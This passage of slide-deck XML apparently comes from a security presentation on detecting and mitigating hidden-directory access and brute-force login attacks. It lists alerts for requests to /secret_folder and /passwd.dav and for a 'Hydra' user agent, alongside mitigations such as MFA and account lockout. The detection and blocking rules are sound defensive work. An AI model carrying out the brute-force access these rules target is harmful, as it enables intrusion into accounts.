            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="962025" y="884025"/>
              <a:ext cx="149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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847750"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1400" name="Google Shape;1400;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Mitigation … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hidden Directory Access </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Sensitive Data Exposure)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1406" name="Google Shape;1406;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407" name="Google Shape;1407;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465800" y="1546763"/>
            <a:ext cx="46905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000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Change passwords</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Educate system users</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Remove password hashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>from user-accessed locations</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Rewrite public-facing website pages</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use multifactor authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(MFA)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1408" name="Google Shape;1408;p85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1409" name="Google Shape;1409;p85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500"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5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="962025" y="884025"/>
              <a:ext cx="149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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1411" name="Google Shape;1411;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1675425"/>
            <a:ext cx="5276700" cy="31482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i="1" lang="en" sz="1800"/>
              <a:t>Alert 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>HTTP requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>for access to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>secret_folder or connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>--- --- --- ---</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for:  </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP requests</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from an external IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for access to any</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password-protected locations</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="14"/>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900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="Google Shape;1413;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Mitigation … Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419;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420" name="Google Shape;1420;p8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b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Require multifactor </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Block </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>additional</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t> packets </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>continuing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t> “Hydra”</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr b="1" sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Lock user account after too many unsuccessful logins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1421" name="Google Shape;1421;p86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1422" name="Google Shape;1422;p86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500"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6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="962025" y="884025"/>
              <a:ext cx="149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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1424" name="Google Shape;1424;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1425" name="Google Shape;1425;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1634038"/>
            <a:ext cx="4905300" cy="30867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i="1" lang="en" sz="1800"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700"/>
              <a:t>lert 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700"/>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>HTTP requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>for access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to /secret_folder or (webDAV) /passwd.dav</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>--- --- --- --- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:endParaRPr i="1"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 HTTP requests that contain </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Hydra”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the user_agent.original field</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--- --- --- ---</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nsuccessful login attempts, </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by any user</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1426" name="Google Shape;1426;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Mitigation ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
